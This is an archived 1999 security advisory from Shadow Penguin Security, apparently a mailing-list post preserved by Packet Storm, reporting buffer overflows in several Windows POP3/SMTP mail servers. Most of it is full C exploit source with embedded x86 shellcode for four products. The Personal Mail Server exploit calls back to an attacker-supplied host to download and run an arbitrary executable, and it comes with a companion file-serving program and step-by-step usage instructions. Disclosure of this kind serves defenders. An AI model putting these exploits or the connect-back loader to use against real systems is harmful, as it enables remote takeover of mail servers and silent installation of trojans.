mail_bof.txt

🗓️ 19 Sep 1999 00:00:00Reported by Packet StormType
packetstorm🔗 packetstormsecurity.com👁 43 Views
Multiple Windows POP3/SMTP servers have buffer overflow vulnerabilities leading to remote exploits.
`Subject: Many kind of POP3/SMTP server softwares for Windows have buffer  
overflow bug  
To: [email protected]   
  
  
Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug  
(by The Shadow Penguin Securuty http://shadowpenguin.backsection.net)  
  
  
1. Introduction  
  
  
I confirmed many kind of POP3/SMTP servers for Windows which are published on  
"SOFT-SEEK.com" contain the buffer overflow bugs. I list the softwares which  
have buffer overflow bug, I also publish the exploit programs for some software.  
  
  
2. POP3/SMTP server softwares which have buffer overflow bugs  
  
  
Software Version Service Overflow Point  
-------------------------------------------------------  
@Work SmartServer3 3.51 SMTP long MAIL FROM:  
CMail Server 2.3 SP2 SMTP long MAIL FROM:  
Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer)  
Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed)  
Internet Anywhere 2.2.2 POP3 long USER  
FuseMail 2.7 POP3 long USER,PASS  
aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER  
  
  
If the host recives the packet which contains the exploit code, the host has been  
cracked by any instructions which are coded in the exploit code. We show the  
demonstration programs which execute any command on the victim host. For the proof  
of the risk of intrusion, I also publish the exploit program for  
"Personal Mail Server" that can send a prepared program to victim host and execute  
it. If the trojan program is sent, the victim machine will be controlled remotely.  
  
  
If the host receives the packet which contains the exploit code, the host will  
execute any instructions that is written in the exploit code. We show the  
demonstration programs which execute any command on the victim host. For the  
proof of the risk of intrusion, I publish the exploit program for  
"Personal Mail Server" that can send a trojan program which is prepared in the  
attacker host. Of course, it can be executed remotely. If the trojan program is  
sent, the victim machine will be controlled remotely.  
  
  
  
3. Exploit  
  
  
I coded the exploits for the following softwares:  
  
  
(1) @Work SmartServer3  
(2) CMail Server  
(3) FuseMail 2.7  
(4) Personal Mail Server  
(5) Tiny FTP daemon  
  
  
(5) is now fixed, I publish the exploit program for (1)-(4)  
  
  
-------------------  
  
  
(1) @Work SmartServer3  
  
  
/*=============================================================================  
NetcPlus SmartServer3 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 2000  
#define SMTP_PORT 25  
#define RETADR 1167  
#define JMPADR 1163  
#define JMPOFS 6  
#define EIP 0xbff7a06b  
#define NOP 0x90  
#define JMPS 0xeb  
  
  
unsigned char exploit_code[200]={  
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,  
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,  
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,  
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,  
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,  
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,  
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,  
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,  
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,  
0xFF,0x00};  
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";  
  
  
int main(int argc,char *argv[])  
{  
struct hostent *hs;  
struct sockaddr_in cli;  
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];  
int sockfd,i,ip;  
  
  
if (argc<2){  
printf("usage\n %s HostName\n",argv[0]);  
exit(1);  
}  
bzero(&cli, sizeof(cli));  
cli.sin_family = AF_INET;  
cli.sin_port = htons(SMTP_PORT);  
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
if ((hs=gethostbyname(argv[1]))==NULL){  
printf("Can not resolve specified host.\n");  
exit(1);  
}  
cli.sin_family = hs->h_addrtype;  
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);  
}  
  
  
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){  
perror("socket"); exit(0);  
}  
  
  
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){  
perror("connect"); exit(0);  
}  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
  
  
strcat(exploit_code,cmdbuf);  
exploit_code[65]=strlen(cmdbuf+23);  
memset(buf,0x90,BUFSIZE);  
ip=EIP;  
buf[RETADR ]=ip&0xff;  
buf[RETADR+1]=(ip>>8)&0xff;  
buf[RETADR+2]=(ip>>16)&0xff;  
buf[RETADR+3]=(ip>>24)&0xff;  
buf[JMPADR] =JMPS;  
buf[JMPADR+1]=JMPOFS;  
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));  
buf[2000]=0;  
  
  
sprintf(packetbuf,"helo penguin\r\n");  
write(sockfd,packetbuf,strlen(packetbuf));  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
printf("%s\n",packetbuf);  
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);  
write(sockfd,packetbuf,strlen(packetbuf));  
sleep(100);  
close(sockfd);  
}  
  
  
-------------------  
  
  
(2) CMail Server  
  
  
/*=============================================================================  
CMAIL Server 2.3 SP2 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 2000  
#define SMTP_PORT 25  
#define RETADR 626  
#define JMPADR 622  
#define JMPOFS 6  
#define EIP 0xbff7a06b  
#define NOP 0x90  
#define JMPS 0xeb  
  
  
unsigned char exploit_code[200]={  
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,  
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,  
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,  
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,  
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,  
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,  
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,  
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,  
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,  
0xFF, 0x00};  
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";  
  
  
int main(int argc,char *argv[])  
{  
struct hostent *hs;  
struct sockaddr_in cli;  
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];  
int sockfd,i,ip;  
  
  
if (argc<2){  
printf("usage\n %s HostName\n",argv[0]);  
exit(1);  
}  
bzero(&cli, sizeof(cli));  
cli.sin_family = AF_INET;  
cli.sin_port = htons(SMTP_PORT);  
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
if ((hs=gethostbyname(argv[1]))==NULL){  
printf("Can not resolve specified host.\n");  
exit(1);  
}  
cli.sin_family = hs->h_addrtype;  
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);  
}  
  
  
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){  
perror("socket"); exit(0);  
}  
  
  
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){  
perror("connect"); exit(0);  
}  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
  
  
strcat(exploit_code,cmdbuf);  
exploit_code[65]=strlen(cmdbuf+23);  
memset(buf,0x90,BUFSIZE);  
ip=EIP;  
buf[RETADR ]=ip&0xff;  
buf[RETADR+1]=(ip>>8)&0xff;  
buf[RETADR+2]=(ip>>16)&0xff;  
buf[RETADR+3]=(ip>>24)&0xff;  
buf[JMPADR] =JMPS;  
buf[JMPADR+1]=JMPOFS;  
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));  
buf[BUFSIZE]=0;  
  
  
sprintf(packetbuf,"helo penguin\r\n");  
write(sockfd,packetbuf,strlen(packetbuf));  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
printf("%s\n",packetbuf);  
sprintf(packetbuf,"MAIL FROM: aa <%[email protected]>\r\n",buf);  
write(sockfd,packetbuf,strlen(packetbuf));  
sleep(100);  
close(sockfd);  
}  
  
  
-------------------  
  
  
(4) FuseMail 2.7  
  
  
/*=============================================================================  
FuseMail Version 2.7 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 1159  
#define RETADR 1074  
#define FTP_PORT 110  
#define JMP_ESP 0xbff7a027  
  
  
unsigned char exploit_code[200]={  
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,  
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,  
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,  
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,  
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,  
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,  
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,  
0xFF,0x00  
};  
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";  
  
  
int main(int argc,char *argv[])  
{  
struct hostent *hs;  
struct sockaddr_in cli;  
char packetbuf[3000],buf[1500];  
int sockfd,i,ip;  
  
  
if (argc<2){  
printf("usage\n %s HostName\n",argv[0]);  
exit(1);  
}  
bzero(&cli, sizeof(cli));  
cli.sin_family = AF_INET;  
cli.sin_port = htons(FTP_PORT);  
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
if ((hs=gethostbyname(argv[1]))==NULL){  
printf("Can not resolve specified host.\n");  
exit(1);  
}  
cli.sin_family = hs->h_addrtype;  
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);  
}  
  
  
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){  
perror("socket"); exit(0);  
}  
  
  
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){  
perror("connect"); exit(0);  
}  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
  
  
strcat(exploit_code,cmdbuf);  
memset(buf,'a',BUFSIZE);  
buf[BUFSIZE]=0;  
ip=JMP_ESP;  
buf[RETADR ]=ip&0xff;  
buf[RETADR+1]=(ip>>8)&0xff;  
buf[RETADR+2]=(ip>>16)&0xff;  
buf[RETADR+3]=(ip>>24)&0xff;  
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));  
sprintf(packetbuf,"USER %s\r\n",buf);  
write(sockfd,packetbuf,strlen(packetbuf));  
  
  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
  
  
memset(packetbuf,0,1024);  
sprintf(packetbuf,"PASS sample\r\n");  
write(sockfd,packetbuf,strlen(packetbuf));  
  
  
close(sockfd);  
}  
  
  
-------------------  
  
  
(4) Personal Mail Server  
  
  
Prog.1 : This program sends the very small client program which can execute the trojan  
after the translation from other host.  
Prog.2 : Program Translation Server. The Program Translation Server which is used by Prog.1  
  
  
  
Prog.1  
  
  
/*=============================================================================  
Personal Mail Server Version 3.072-3.09 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 4000  
#define SMTP_PORT 25  
#define RETADR 267  
#define JMPADR 263  
#define JMPOFS 6  
#define EIP 0xbff7a06b  
#define NOP 0x90  
#define JMPS 0xeb  
  
  
unsigned char exploit_code[700]={  
0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,  
0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,  
0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,  
0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,  
0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,  
0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,  
0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,  
0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,  
0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,  
0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,  
0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,  
0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,  
0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,  
0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,  
0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,  
0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,  
0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,  
0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,  
0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,  
0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,  
0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,  
0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,  
0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,  
0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,  
0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,  
0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,  
0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,  
0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,  
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,  
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,  
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,  
0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,  
0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,  
0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,  
0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,  
0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,  
0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,  
0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,  
0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00  
};  
  
  
int main(int argc,char *argv[])  
{  
struct hostent *hs;  
struct sockaddr_in cli;  
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];  
int sockfd,i;  
unsigned int ip,port,yourip;  
  
  
if (argc<3){  
printf("usage\n %s VictimHostName YourHostName\n",argv[0]);  
exit(1);  
}  
if ((yourip=inet_addr(argv[2]))==-1){  
if ((hs=gethostbyname(argv[2]))==NULL){  
printf("Can not resolve specified YourHost.\n");  
exit(1);  
}  
memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length);  
}  
bzero(&cli, sizeof(cli));  
cli.sin_family = AF_INET;  
cli.sin_port = htons(SMTP_PORT);  
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
if ((hs=gethostbyname(argv[1]))==NULL){  
printf("Can not resolve specified VictimHost.\n");  
exit(1);  
}  
cli.sin_family = hs->h_addrtype;  
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);  
}  
  
  
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){  
perror("socket"); exit(0);  
}  
  
  
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){  
perror("connect"); exit(0);  
}  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
printf("1:%s\n",packetbuf);  
  
  
memset(buf,0x90,BUFSIZE);  
for (i=267;i<271;i++) buf[i]=0x30;  
ip=EIP;  
buf[RETADR ]=ip&0xff;  
buf[RETADR+1]=(ip>>8)&0xff;  
buf[RETADR+2]=(ip>>16)&0xff;  
buf[RETADR+3]=(ip>>24)&0xff;  
buf[JMPADR] =JMPS;  
buf[JMPADR+1]=JMPOFS;  
  
  
port=7000;  
exploit_code[0xc3]=(port>>8) & 0xff;  
exploit_code[0xc4]=port & 0xff;  
ip=htonl(yourip);  
exploit_code[0xc8]=(ip>>24) & 0xff;  
exploit_code[0xc9]=(ip>>16) & 0xff;  
exploit_code[0xca]=(ip>>8) & 0xff;  
exploit_code[0xcb]=ip & 0xff;  
  
  
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));  
buf[BUFSIZE]=0;  
  
  
sprintf(packetbuf,"helo penguin\r\n");  
write(sockfd,packetbuf,strlen(packetbuf));  
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){  
packetbuf[i]=0;  
if(strchr(packetbuf,'\n')!=NULL) break;  
}  
printf("%s\n",packetbuf);  
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);  
write(sockfd,packetbuf,strlen(packetbuf));  
close(sockfd);  
}  
  
  
Prog.2  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <errno.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
  
  
#define PORT_NUM 7000  
#define BUFSIZE 1000  
#define SENDFILE "test.exe"  
  
  
int get_connection(port, listener)  
int port;  
int *listener;  
{  
struct sockaddr_in address,acc;  
int listening_socket,connected_socket;  
int reuse_addr=1,acclen=sizeof(acc);  
  
  
memset((char *) &address, 0, sizeof(address));  
address.sin_family = AF_INET;  
address.sin_port = htons(port);  
address.sin_addr.s_addr = htonl(INADDR_ANY);  
listening_socket = socket(AF_INET, SOCK_STREAM, 0);  
if (listening_socket < 0) {  
perror("socket"); exit(1);  
}  
if (listener != NULL) *listener = listening_socket;  
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,  
(void *)&reuse_addr,sizeof(reuse_addr));  
if (bind(listening_socket,(struct sockaddr *)&address,  
sizeof(address))<0){  
perror("bind"); exit(1);  
}  
listen(listening_socket, 5);  
connected_socket=accept(listening_socket,  
(struct sockaddr *)&acc,&acclen);  
return connected_socket;  
}  
int main(argc, argv)  
int argc;  
char *argv[];  
{  
int sock,listensock,i,r,l;  
char buf[BUFSIZE];  
struct stat st;  
FILE *fp;  
  
  
if ((fp=fopen(SENDFILE,"rb"))==NULL){  
printf("File not found \"%s\"\n",SENDFILE);  
exit(1);  
}  
stat(SENDFILE,&st);  
r=st.st_size/BUFSIZE+1;  
sock = get_connection(PORT_NUM, &listensock);  
for (i=0;;i++){  
l=fread(buf,1,BUFSIZE,fp);  
if (l<=0) break;  
write(sock,buf,l);  
}  
fclose(fp);  
close(sock);  
}  
  
  
<< Demonstration >>  
  
  
Victim host : 192.168.200.200  
Your host : 192.168.100.100  
  
  
(1) copy your testprogram "test.exe" to UNIX machine.  
(2) gcc ex_pms1.c -o pms1  
(3) gcc sendexp.c -o sendexp  
(4) ./sendexp &  
(5) ./pms1 192.168.200.200 192.168.100.100  
  
  
You can send "test.exe" to victim host, and can execute it remotely.  
The size of "test.exe" is not limited.  
  
  
-----  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Webmaster / UNYUN ([email protected])  
`
19 Sep 1999 00:00Current
pop3 server vulnerability smtp server vulnerability buffer overflow bug exploit program remote control risk attack demonstration